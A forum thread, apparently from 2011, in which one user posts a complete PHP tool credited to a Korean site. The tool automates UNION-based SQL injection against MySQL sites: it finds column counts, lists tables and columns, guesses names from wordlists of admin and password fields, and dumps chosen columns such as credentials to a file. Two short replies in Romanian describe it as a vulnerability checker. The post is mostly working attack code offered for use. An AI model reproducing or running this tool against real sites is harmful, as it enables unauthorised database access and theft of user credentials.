denjacker Posted April 28, 2011 Report Posted April 28, 2011 <?php//author:www.vul.krerror_reporting(0);ini_set("max_execution_time",0);ini_set("default_socket_timeout",10);$server=$argv[1];$mode=$argv[2];$database=$argv[3];$server=str_replace("\"","",$server);$num=0;if(!$server||!$mode){print_r('--------------------------Begin Code By www.vul.kr------------------------------Usage: php.exe '.$argv[0].' Url Options Database TableOptions:1 Show Union Number [MYSQL 4/5 VERSION]2 Show Tables [MYSQL 5 VERSION]3 Show Columns [MYSQL 5 VERSION]4 Show Content [MYSQL 4/5 VERSION]5 Guess Tables [MYSQL 4 VERSION]6 Guess Columns [MYSQL 4 VERSION]-------------------------------End-----------------------------------------');exit;}function str_todex($string){$num=strlen($string);for($i=0;$i<$num;$i++){$str=substr($string,$i,$i+1);$ascii=ord($str);$hex.=dechex($ascii);}$hex="0x".$hex;return $hex;}if($mode==1) {$injstr="0x5B676F6F676C656F72675D";$ins=$injstr;for($j=1;$j<=50;$j++){$expurl=$server."%09and%091=2%09UnIoN%09SeLeCt%09".$injstr."%23";echo ".."; $reponse=@file_get_contents($expurl); if(strstr($reponse,"[googleorg]")){ echo "\r\nFind Colnums Numbers: $j \r\n";break;}$injstr=$ins.",".$injstr;}$expurlps=$server."%09and%091=2%09UnIoN%09SeLeCt%09";$data=$expurlps;$aall="";$dote=",";for($k=1;$k<=$j;$k++){$aall=$aall.$k.$dote;}$unum=substr($data.$aall,0,strlen($data.$aall)-1);$expurl="%23";$rurl=$unum.$expurl;$fp=fopen("url.txt","w");fwrite($fp,$rurl);//echo "\r\n$rurl";echo "\r\n go and see url.txt";}elseif($mode==2){if($argc<>6) {echo "\r\ninjection-url option database Union-NO Union-postion\r\n";exit;}//-----------------------------get the NO of 
tables------------------------------------------------------------$expurl0=$server."%09and%091=2%09UnIoN%09SeLeCt%09";$UnIoNnum=$argv[4]+500;$data=$expurl0;$aall="";$dote=",";for($k=501;$k<=$UnIoNnum;$k++){$aall=$aall.$k.$dote;}$unum=$data.substr($aall,0,strlen($aall)-1);$replacetext="CoNcAt(0x5B676F6F676C656F72675D,count(*),0x5B2F676F6F676C656F72675D)";$expurl1.="%09FrOm%09information_schema.tables%09";$expurl1.="WhErE%09TABLE_SCHEMA=".str_todex($database)."%23";$rurl=$unum.$expurl1;$search=$argv[5]+500;$endurl=str_replace($search,$replacetext,$rurl);//---------------------------------------------------------------------------------------------$reponse1=@file_get_contents($endurl);preg_match_all('/\[googleorg\](.*?)\[\/googleorg\]/i',$reponse1,$matchs1);if($crack1=($matchs1[1])){$Tnum=$crack1[0];echo "\r\nFind $Tnum tables\r\n";}for($i=0;$i<$Tnum;$i++){echo "\r\n";//-----------------------------Get tables-----------------------------------------------------------$expurfirst=$server."%09and%091=2%09UnIoN%09SeLeCt%09";$data=$expurfirst;$aall="";$dote=",";for($k=501;$k<=$UnIoNnum;$k++){$aall=$aall.$k.$dote;}$unum=substr($data.$aall,0,strlen($data.$aall)-1);$replacetxt="CoNcAt(0x5B676F6F676C656F72675D,TABLE_NAME,0x5B2F676F6F676C656F72675D)";$expurl="%09FrOm%09information_schema.tables%09";$expurl.="WhErE%09TABLE_SCHEMA=".str_todex($database)."%09limit%09$i,1%23";$rurl=$unum.$expurl;$endurl=str_replace($search,$replacetxt,$rurl);//------------------------------------------------------------------------------------------------$reponse=@file_get_contents($endurl);preg_match_all('/\[googleorg\](.*?)\[\/googleorg\]/i',$reponse,$matchs);if($crack=($matchs[1])){$fp=fopen("table.txt","a+");fwrite($fp,$crack[0]."\r\n");echo $crack[0]."\t";}//else{echo "Done!\r\n";break;}}}elseif($mode==3){$table=$argv[6];if($argc<>7) {echo "\r\ninjection-url option database Union-NO Union-postion tablename\r\n";exit;}//--------------------------------get count 
colnums------------------------------------------------------------$expurlexp=$server."%09and%091=2%09UnIoN%09SeLeCt%09";$UnIoNnum=$argv[4]+500;$data=$expurlexp;$aall="";$dote=",";for($k=501;$k<=$UnIoNnum;$k++){$aall=$aall.$k.$dote;}$unum=$data.substr($aall,0,strlen($aall)-1);$replacetx="CoNcAt(0x5B676F6F676C656F72675D,count(*),0x5B2F676F6F676C656F72675D)";$expurl2="%09FrOm%09information_schema.COLUMNS";$expurl2.="%09WhErE%09TABLE_SCHEMA=".str_todex($database)."%09and%09TABLE_NAME=".str_todex($table)."%23";$rurl=$unum.$expurl2;$search=$argv[5]+500;$endurl=str_replace($search,$replacetx,$rurl);//---------------------------------------------------------------------------------------------$reponse2=@file_get_contents($endurl);preg_match_all('/\[googleorg\](.*?)\[\/googleorg\]/i',$reponse2,$matchs2);if($crack2=($matchs2[1])){$Cnum=$crack2[0];echo "\r\nFind $Cnum Colnums\r\n";}for($i=0;$i<$Cnum;$i++){//--------------------------------Get Colnums------------------------------------------------------------$expurlps=$server."%09and%091=2%09UnIoN%09SeLeCt%09";$data=$expurlps;$aall="";$dote=",";for($k=501;$k<=$UnIoNnum;$k++){$aall=$aall.$k.$dote;}$unum=substr($data.$aall,0,strlen($data.$aall)-1);$replay="CoNcAt(0x5B676F6F676C656F72675D,COLUMN_NAME,0x5B2F676F6F676C656F72675D)";$expurl="%09FrOm%09information_schema.COLUMNS";$expurl.="%09WhErE%09TABLE_SCHEMA=".str_todex($database)."%09and%09TABLE_NAME=".str_todex($table)."%09Limit%09$i,1%23";$rurl=$unum.$expurl;$search=$argv[5]+500;$endurl=str_replace($search,$replay,$rurl);//---------------------------------------------------------------------------------------------$reponse=@file_get_contents($endurl);preg_match_all('/\[googleorg\](.*?)\[\/googleorg\]/i',$reponse,$matchs);if($crack=($matchs[1])){$fp=fopen("column.txt","a+");fwrite($fp,$crack[0]."\r\n");echo $crack[0]."\t";}//else{echo "Down!\r\n";break;}}}//--------------------------MYSQL4.0 Guess table---------------------------------------elseif($mode==5) {if($argc<>5) 
{echo "\r\ninjection-url option Union-NO Union-postion \r\n";exit;}$tmptalble=array('users','user','admin','ident','adminlog','members','member','eq_users','tb_users','tbl_user','login','logging','nuke_users','admins','group_members','phpbb_users','administrator','admin_log','pass_admin','wp_users','accounts','adminlogin','auth','authenticate','authentication','account','customers','config','conf','cfg','sb_host_admin','WebAdmin','super','administrateurs','webmaster','webmasters','webuser','userinfo','userlist','sysadmins','manager','memberlist','logs','login','customer','edit','editor','administration','accounts','cms_admin','cms_admins','cms_user','cms_users','xoops_users','vbulletin_user','vb_user','user_login','user_logins','user_admin','tb_member','tb_members','tb_administrator','tb_login','tb_user','sysadmin','smf_members','smallnuke_members','site_logins','site_login','sitelogin','siteslogins','punbb_users','poll_user','phpBB2.phpbb_users','phpBB2.forum_users','phpbb_users','phorum_user','nuke_users','nuke_authors','mybb_users','mysql.user','login_admin','login_admins','login_user','login_users','jos_users','jos_joomblog_users','ipb.ibf_members','ibf_members','forum.ibf_members','fusion_users','e107_user','e107.e107_user','dbadmins','cpg132_users','chat_users','article_admin','Administratoren','administrieren','4images_users');$expurlexp=$server."%09and%091=2%09UnIoN%09SeLeCt%09";$UnIoNnum=$argv[3]+500;$data=$expurlexp;$aall="";$dote=",";for($k=501;$k<=$UnIoNnum;$k++){$aall=$aall.$k.$dote;}$unum=$data.substr($aall,0,strlen($aall)-1);$replay="0x5B676F6F676C656F72675D";$expurl="%09FrOm%09[chinapost]%23";$rurl=$unum.$expurl;$search=$argv[4]+500;$endurl=str_replace($search,$replay,$rurl);$endurl2=$endurl;//---------------------------------------------------------------------------------------------for($j=0;$j<count($tmptalble);$j++){$tb=$tmptalble[$j];$endurl=str_replace("[chinapost]",$tb,$endurl);$reponse=@file_get_contents($endurl);if(strstr($reponse,"[googleor
g]")){echo "\r\nFind Table: ".$tmptalble[$j];}$endurl=$endurl2;}}//--------------------------MYSQL4.0 Guess Colnums---------------------------------------elseif($mode==6) {if($argc<>7){echo "\r\ninjection-url option Union-NO Union-Postion Choose-postion tablename \r\n";exit;}$tmpcol=array('id','uid','userid','username','cst','user','pseudo','pw','pass','password','uname','login','login_user','memeber_pass','memberpwd','login_pass','login_name','userpassword','userpw','userpwd,','member_pwd','memberpw','user_name','name','usr','adminname','admin','adminpass','adminpassword','passwd','adminpasswd','pwd','script','user_login','user_pass','login_passwort','usrname','usrpass','usr_pass','userpass','user_password','administrator','usrpw','adminpwd','adminpw','userPassword','Userlogin','Administratorzy','Administrator','pWord','passer','Passw','membres','membername','wp_users','usrs','usrnam','usrname','usrn','usernm','useradmin','user_usrnm','user_usernm','user_pword','user_pwrd','user_pwd','user_passw','user_email','user_admin','pwrd','pword','psw','passw','pass_word','pass_hash','p_word','memlogin','mempassword','members','membername','memberid','member_name','member_id','mem_pwd','mem_password','mem_passwd','mem_pass','mem_login','mail','md5hash','logins','login_username','login_user','login_pwd','auth','adminuserid','adminuser','adminemail','admin_userid','admin_user','admin_pwd','admin_password','admin_passwd','admin_pass','admin_name','account','accounts','sb_admin_name','sb_pwd');$expurlexp=$server."%09and%091=2%09UnIoN%09SeLeCt%09";$UnIoNnum=$argv[3]+500;$Gtable=$argv[6];$data=$expurlexp;$aall="";$dote=",";for($k=501;$k<=$UnIoNnum;$k++){$aall=$aall.$k.$dote;}$unum=$data.substr($aall,0,strlen($aall)-1);$replay="0x5B676F6F676C656F72675D";$expurl="%09FrOm%09".$Gtable."%23";$rurl=$unum.$expurl;$search=$argv[4]+500;$SeLeCtsearch=$argv[5]+500;$endurl=str_replace($search,$replay,$rurl);$endurl2=$endurl;//-------------------------------------------------------------------
--------------------------for($j=0;$j<count($tmpcol);$j++){$tb=$tmpcol[$j];$endurl=str_replace($SeLeCtsearch,$tb,$endurl);$reponse=@file_get_contents($endurl);if(strstr($reponse,"[googleorg]")){echo "\r\nFind Column: ".$tmpcol[$j];}$endurl=$endurl2;}}elseif($mode==4){$table=$argv[6];$column=$argv[7];$column2=$argv[8];if($argc<>9){echo "\r\ninjection-url option database Union-NO Union-postion tablename colnum1 colnum2\r\n";exit;}//--------------------------------Get contents count-------------------------------------------------------------$expurlexp=$server."%09and%091=2%09UnIoN%09SeLeCt%09";$UnIoNnum=$argv[4]+500;$data=$expurlexp;$aall="";$dote=",";for($k=501;$k<=$UnIoNnum;$k++){$aall=$aall.$k.$dote;}$unum=$data.substr($aall,0,strlen($aall)-1);$replacetx="CoNcAt(0x5B676F6F676C656F72675D,count(*),0x5B2F676F6F676C656F72675D)";$expurl2="%09FrOm%09$database.$table%23";$rurl=$unum.$expurl2;$search=$argv[5]+500;$endurl=str_replace($search,$replacetx,$rurl);//---------------------------------------------------------------------------------------------$reponse2=@file_get_contents($endurl);preg_match_all('/\[googleorg\](.*?)\[\/googleorg\]/i',$reponse2,$matchs2);if($crack2=($matchs2[1])){$Cnum=$crack2[0];echo "\r\nFind $Cnum recodes\r\n";}for($i=0;$i<$Cnum;$i++){//--------------------------------Get 
contents------------------------------------------------------------$expurlps=$server."%09and%091=2%09UnIoN%09SeLeCt%09";$data=$expurlps;$aall="";$dote=",";for($k=501;$k<=$UnIoNnum;$k++){$aall=$aall.$k.$dote;}$unum=substr($data.$aall,0,strlen($data.$aall)-1);$replay="CoNcAt(0x5B676F6F676C656F72675D,".$column.",0x7C,".$column2.",0x5B2F676F6F676C656F72675D)";$expurl="%09FrOm%09$database.$table%09Limit%09$i,1%23";$rurl=$unum.$expurl;$search=$argv[5]+500;$endurl=str_replace($search,$replay,$rurl);//---------------------------------------------------------------------------------------------$reponse=@file_get_contents($endurl);preg_match_all('/\[googleorg\](.*?)\[\/googleorg\]/i',$reponse,$matchs);if($crack=($matchs[1])){$fp=fopen("content.txt","a+");fwrite($fp,$crack[0]."\r\n");echo $crack[0]."\t";}//else{echo "done!\r\n";break;}}}?>http://img.vul.kr/uploads/20090729/1248888141mysql-auto.txt 1 Quote
nedo Posted May 3, 2011 Report Posted May 3, 2011 (edited) E un script php care verifica daca este vulnerabila o baza de date. LE: Xander are dreptate, m-am exprimat gresit. De fapt testeaza daca o pagina care acceseaza o baza de date mysql 4/5 este vulnerabila la injectie sql. Edited May 3, 2011 by nedo Quote
Xander Posted May 3, 2011 Report Posted May 3, 2011 o baza de date nu are cum sa fie in sine vulnerabila lol... scriptul poate fi vulnerabil sau serverul bazei de date... dar baza de date nu Quote